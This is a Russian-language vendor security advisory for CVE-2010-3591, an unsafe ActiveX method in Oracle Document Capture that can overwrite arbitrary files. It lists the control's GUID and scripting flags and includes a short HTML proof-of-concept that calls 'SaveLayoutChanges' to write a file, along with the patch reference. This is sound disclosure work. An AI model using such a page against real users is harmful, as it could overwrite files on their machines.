Услуги
Аудит информационной безопасности

Аудит информационной безопасности компании – многоплановая задача, в
которую входит несколько направлений анализа
ИТ-инфраструктуры и оценки защищенности приложений и устройств

Подробнее
Решения
Решения

Аккумулировав весь опыт Digital Security, мы подготовили отдельные решения по аудиту безопасности. Каждое решение объединяет специализированные услуги для конкретной отрасли бизнеса или сферы исследования. Вы можете выбрать любую из них или несколько — в комплексе

О нас
Digital Security

Практическая информационная безопасность – наша специализация и любимое дело. Уже 18 лет мы помогаем нашим клиентам уберечь сервисы и системы от киберугроз, а также активно участвуем в развитии мирового ИБ-сообщества

Подробнее
Экспертиза
Экспертиза

Для клиентов Digital Security работает команда экспертов ИБ мирового уровня. Мы получаем благодарности за вклад в обеспечение безопасности от лидеров ИТ-индустрии, а также подтверждаем свои навыки международными сертификатами в области ИБ

Подробнее
Ресурсы
Ресурсы

Мы создаем контент для тех, кому интересна информационная безопасность. Многостраничные технические статьи, бизнес-аналитика с емкими выводами, записи вебинаров и презентации с профильных конференций — все вы найдете в этом разделе

Подробнее

Мы создаем контент для тех, кому интересна информационная безопасность. Многостраничные технические статьи, бизнес-аналитика с емкими выводами, записи вебинаров и презентации с профильных конференций — все вы найдете в этом разделе

Посмотреть раздел

Масштабные исследования и аналитические обзоры. Описания хакерских инструментов и техник

Статьи и аналитические работы, полезные для бизнеса. Экспертное мнение об актуальных проблемах информационной безопасности

Видеоархив наших вебинаров и конференций. А также анонсы предстоящих мероприятий

Руководства, презентации, чек-листы. Гайды для повышения уровня осведомленности в вопросах ИБ

Наверх

CVE-2010-3591: Небезопасный метод

Вендор

Oracle

Продукт

Oracle Document Capture Release 10gR3

Тип уязвимости

Небезопасный метод

Reported

23.03.2010

Date of Public Advisory

25.01.2011

Подтверждение

Автор

Дмитрий Евдокимов

Детальное описание

Oracle Document Capture содержит компонент ActiveX ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}, который содержит небезопасный метод «SaveLayoutChanges», способный переписать любой нескрытый файл в системе.

Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False

Эксплойт
Злоумышленник может создать HTML-страницу, которая вызовет уязвимую функцию «SaveLayoutChanges» из компонента ActiveX Actbar2.ocx

Пример
<HTML>
<HEAD>
<TITLE>DSecRG</TITLE>
</HEAD>
<BODY>

<OBJECT id=’eds’ classid=’clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9′></OBJECT>

<SCRIPT>

function Exploit(){
eds.SaveLayoutChanges(«C:\\31337.txt»,1);
}
Exploit();

</SCRIPT>
</BODY>
</HTML>

Решение
Информация была опубликована в CPU, Январь 2011.
Клиенты могут загрузить патчи CPU, следуя инструкциям по ссылке:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

Мы используем куки. Никогда такого не было, объясните

ОК